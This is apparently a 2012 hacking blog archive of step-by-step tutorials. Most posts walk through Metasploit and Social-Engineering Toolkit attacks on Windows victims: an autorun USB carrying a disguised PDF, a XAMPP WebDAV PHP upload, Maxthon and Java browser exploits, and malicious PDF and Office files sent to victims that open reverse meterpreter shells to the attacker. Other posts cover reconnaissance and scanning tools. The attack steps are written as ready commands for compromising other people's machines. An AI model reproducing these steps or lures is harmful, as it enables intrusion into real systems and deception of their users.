Saturday, December 29, 2012

Remote System Hacking using USB + pdf Reader attack

Remote System Hacking using Autorun.inf file

In this attack we use the autorun.inf file to establish the connection without clicking the file

Requirement :

Attacker : Backtrack

Victim : windows xp , windows 7 having pdf reader or comparable vulnerable software like ms-office or etc

Step 1 : go to the social engineering toolkit using

cd /pentest/exploits/set

./set

Step 2 : select the Social-Engineering Attacks by selecting 1

Step 3 : Select Infectious Media Generator by selecting option 3

Infectious Media Generation generate a autorun.inf file and a metasploit payload and these files can be copied into the USB/DVD/CD as the victim open the USB the payloads runs automatically .

Step 4 : select 1 for file-format exploits

here is the list of payloads you can select the payloads as per your requirements here i am using 11 adobe pdf Embedded EXE Social Engineering .

Step 5 : select 1 for use your own PDF for Attack

Now enter the path to pdf file as /home/exam-sheet.pdf (file name as exam-sheet.pdf )

Step 6 : select 2 for windows/meterpreter/reverse_tcp

Step 7 : IP address for listener attacker machine IP here my system address will be 192.168.56.101 and select Port to connect as port 80 which provides us the reverse connection using this port .

Step 8 : here we need to edit the autorun.inf file here go to the directory of autorun where our both files payload file & autorun file
follow the following steps to edit & rename our files

open new terminal and type

ls -al /pentest/exploits/set/autorun/ we can see two files here one is autorun file and other is template

Now go to the directory cd /pentest/exploits/set/autorun

cd /pentest/exploits/set/autorun : ls (to see all files in the directory)

type nano autorun.inf (it will open a nano editor for editing autorun.inf file here give the name of your file which you want to open by plugin the USB here i gives the name as exame-sheet.pdf)
for changing the name of the file type mv template.pdf exame-sheet.pdf
copy these both files into our usb drives

As we plugins the usb in the victim system the meterpreter sessions will opens

we can list the open sessions by typing sessions -l commands & for connecting the sessions type sessions -i 1

Friday, December 28, 2012

Remote System Hacking using XAMPP Server

XAMPP WebDAV PHP Upload :

This module exploits weak WebDAV passwords on XAMPP servers. It uses supplied credentials to upload a PHP payload and execute it.

Exploit Targets :

xampp server having week webDAV passwords

Requirements :

Attacker : Backtrack

Victim : windows xp & windows 7

Step 1 : open terminal and type msfconsole metasploit framework.

Step 2 : use exploit/windows/http/xampp_webdav_upload_php

Step 3 : show payloads (It shows us all the payloads comparable to exploits)

Step 4 : set RHOST 192.168.56.102 (target IP address )

Step 5 : set LHOST 192.168.56.101 (Attacker Machine IP address)

Step 6 : exploit

As we starts exploitation the reverse handler starts on attacker machine and the php payload is uploaded on the victim system .

Monday, December 24, 2012

WebSploit Framework

WebSploit Framework : WebSploit is an open source project which is used to scan and analysis remote system in order to find various type of vulnerabilities . This tool is very powerful and support multiple vulnerabilities.

Description

WebSploit Is An Open Source Project For :

[>]Social Engineering Works
[>]Scan,Crawler & Analysis Web
[>]Automatic Exploiter
[>]Support Network Attacks

----
[+]Autopwn - Used From Metasploit For Scan and Exploit Target Service
[+]wmap - Scan,Crawler Target Used From Metasploit wmap plugin
[+]format infector - inject reverse & bind payload into file format
[+]phpmyadmin Scanner
[+]LFI Bypasser
[+]Apache Users Scanner
[+]Dir Bruter
[+]admin finder
[+]MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
[+]MITM - Man In The Middle Attack
[+]Java Applet Attack
[+]MFOD Attack Vector
[+]USB Infection Attack
[+]ARP Dos Attack
[+]Web Killer Attack
[+]Fake Update Attack
[+]Fake Access point Attack

Sunday, December 23, 2012

Dnstracer :Information Gathering Tool

Dnstracer : dnstracer is a pen testing tool used for tracing a chain of DNS servers to the source

How Does DNStracer work ?

It sends the specified name-server a non-recursive request for the name.
Non-recursive means: if the name-server knows it, it will return the data requested. If the name-server doesn't know it, it will return pointers to name-servers that are authoritive for the domain part in the name or it will return the addresses of the root name-servers.
If the name server does returns an authoritative answer for the name, the next server is queried. If it returns an non-authoritative answer for the name, the name servers in the authority records will be queried.
The program stops if all name-servers are queried. Make sure the server you're querying doesn't do forwarding towards other servers, as dnstracer is not able to detect this for you. It detects so called lame servers, which are name-servers which has been told to have information about a certain domain, but don't have this information.

Syntax : dnstracer [options] [host]

dnstracer in verbose mode

DNSmap : Information Gathering

Dnsmap: dnsmap is also a dns enumeration tool , It is basically used By Pen-testers to gather the Information about the target .

Features of Dnsmap:

obtain all IP addresses (A records) associated to each successfully bruteforced subdomain, rather than just one IP address per subdomain
abort the bruteforcing process in case the target domain uses wildcards
ability to be able to run the tool without providing a wordlist by using a built-in list of keywords
bruteforcing by using a user-supplied wordlist (as opposed to the built-in wordlist)
saving the results in human-readable and CSV format for easy processing
improved built-in subdomains wordlist
new bash script (dnsmap-bulk.sh) included which allows running dnsmap against a list of domains from a user-supplied file. i.e.: bruteforcing several domains in a bulk fashion
bypassing of signature-based dnsmap detection by generating a proper pseudo-random subdomain when checking for wildcards

For the DNSmap in Backtrack 5 go to the following steps :

Applications>Backtrack>Information Gathering>Network Analysis>DNS analysis>dnsmap

Syntax : ./dnsmap <target-domain> [options]

DNSenum : Information Gathering

Dnsenum: Dnsenum is ainformation Gathering Tool,It is available in the Backtrack 5 .we can find the Following Information using DNSenum

Host address
Name server
MX record
Sub domains
Whois performance
Reverse lookup for netblocks
Use google to do the job done

For the DNSenum in Backtrack 5 go to the following steps :

Applications>Backtrack>Information Gathering>Network Analysis>DNS analysis>dnsenum

Syntax: ./dnsenum.pl [options] <domain>

Monday, December 17, 2012

Remote System Hacking using Maxthon Browser

Maxthon3 about:history XCS Trusted Zone Code Execution

Cross Context Scripting (XCS) is possible in the Maxthon about:history page. Injection in such privileged/trusted browser zone can be used to modify configuration settings and execute arbitrary commands. Please note this module only works against specific versions of XCS. Currently, we've only successfully tested on Maxthon 3.1.7 build 600 up to 3.2.2 build 1000.

Exploit Targets :

0 - Maxthon 3 (prior to 3.3) on Windows (default)

Requirement :

Attacker : Backtrack

Victim : Windows

Step 1 : open terminal and type msfconsole metasploit framework

Step 2 : use exploit/windows/browser/mexthon_history_xcs

Step 3 : set payload windows/meterpreter/reverse_tcp

Step 4 : show options

Step 5 : set all the perimeters

set SRVHOST 192.168.56.102 (IP Address of the Local Machine)

set URIPATH / (root Address)

set LHOST 192.168.56.102 (Host IP Address)

Step 6 : exploit

Now the reverse handler is start on 192.168.56.102:4444 our host address and exploit is start on the url http://192.168.56.102:8080/ and we have to send this url to the victim machine as the victim click on the url we get the meterpreter sessions . Here we get the two meterpreter sessions let's check this by using command sessions -l this command shows us list of all the Active sessions

Now type sessions -i 1 to get the meterpreter sessions now let me check the sysinfo this command gives us the information about the remote system. now type shell to get into the remote system .

And now we have the cmand prompt of the remote system .

Friday, December 14, 2012

Remote System Hacking using Java Applet JAX-WS

Java Applet JAX-WS Remote Code Execution

This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.

Exploit Targets

0 - Generic (Java Payload) (default)
1 - Windows Universal
2 - Linux x 86

Requirement :

Attacker :Backtrack

Victim PC : Windows

Step 1: open terminal and type msfconsole

Step 1: Now use exploit/multi/browser/java_jre17_jaxws

Step 2 : search for the payload here we are using java/shell_reverse_tcp
show options

set the required options
set LHOST 192.168.133.130
set SRVHOST 192.168.133.130
Now exploit

Now list the sessions by using sessions -l command to access the session use sessions -i 1 (session ID)

Thursday, December 13, 2012

Hack Remote PC using Adobe Reader

Adobe Acrobat Bundled LibTIFF Integer Overflow

This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3.

Exploit Targets

Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass) (default)

Requirement :

Attacker :Backtrack

Victim PC : Windows

Step 1: open terminal and type msfconsole

Step 2: Now type use exploit/windows/fileformat/adobe_libtiff

set payload windows/meterpreter/reverse_tcp

show options

Step 3 : set the required parameters

set FILENAME result.pdf

set LHOST 192.168.56.102

exploit

Now the pdf file is created which we have to send at /root/.msf4/local/result.pdf

we have to send this file to victim

Step 4: to get the reverse connection we set the multi handler

Now we have to use a multi handler session so that we can get the reverse connection to do that we have to use

use exploit/multi/handler

and

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.56.102

exploit

as the victim click on it the meterpreter session is on we done the job

Hack Remote PC using microsoft Office 2007 & 2010

MS12-027 MSCOMCTL ActiveX Buffer Overflow

This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited in the wild on April 2012. This module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses "msgr3en.dll", which will load after office got load, so the malicious file must be loaded through "File / Open" to achieve exploitation.

Exploit Targets

0 - Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English (default)
1 - Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English

Requirement

Attacker :Backtrack

Victim PC : Windows xp

step 1: open your terminal and type msfconsole

Step 2: now type use exploit/windows/fileformat/ms12_027_mscomctrl_bof

Step 3 : set the required paremeters

set payload windows/meterpreter/reverse_tcp

show options

set FILENAME Hack.doc (give name to the file you want)

set lhost 192.168.56.102

exploit

now the doc file which we have to sent to the victim is created at /root/.msf4/local/hack.doc

we have to send this file to the victim

Step 4: to get the reverse connection we set the multi handler

Now we have to use a multi handler session so that we can get the reverse connection to do that we have to use

use exploit/multi/handler

and

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.56.102

exploit

as the victim click on it the meterpreter session is on we done the job

Sunday, December 9, 2012

Nessus : Vulnerability Scanner

Nessus : In computer security, Nessus is a proprietary comprehensive vulnerability scanning program. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems.

Nessus allows scans for the following types of vulnerabilities:

Vulnerabilities that allow a remote hacker to control or access sensitive data on a system.
Misconfiguration (e.g. open mail relay, missing patches, etc.).
Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
Denials of service against the TCP/IP stack by using mangled packets
Preparation for PCI DSS audits

first of all we need to Registerthe nessuss it will provide us the activation code.

Go to the Application>Backtrack>Vulnerability Assessment>Vulnerability Scanners>Nessuss>Nessuss Registration.

It will send us on the nessuss website for registration click on home user register it will provide you a activation code

Now follows the steps

Go to the terminal and type /opt/nessus/bin/nessus -fetch --register <Code here>

Now we have to add a user for adding a user Go to Application>Backtrack>Vulnerability Assessment>Vulnerability Scanners>Nessuss>nessus user add
or goto the terminal and type /opt/nessus/sbin/nessus-adduser

To start the nessus goto Application>Backtrack>Vulnerability Assessment>Vulnerability Scanners>Nessuss>nessus start

Saturday, December 8, 2012

Joomscan :Vulnerability Scanner

Joomscan : joomscan is the CMS Vulnerability Identification Tool this tool is used for finding the vulnerability in the website. joomscan is a signature based scanner which can detect the XSS?CSRF ,aql injection etc in the website .

Go to : Backtrack>Vulnerability Assessment>Web Assessment>CMS Vulnerability Identification Tool>joomsc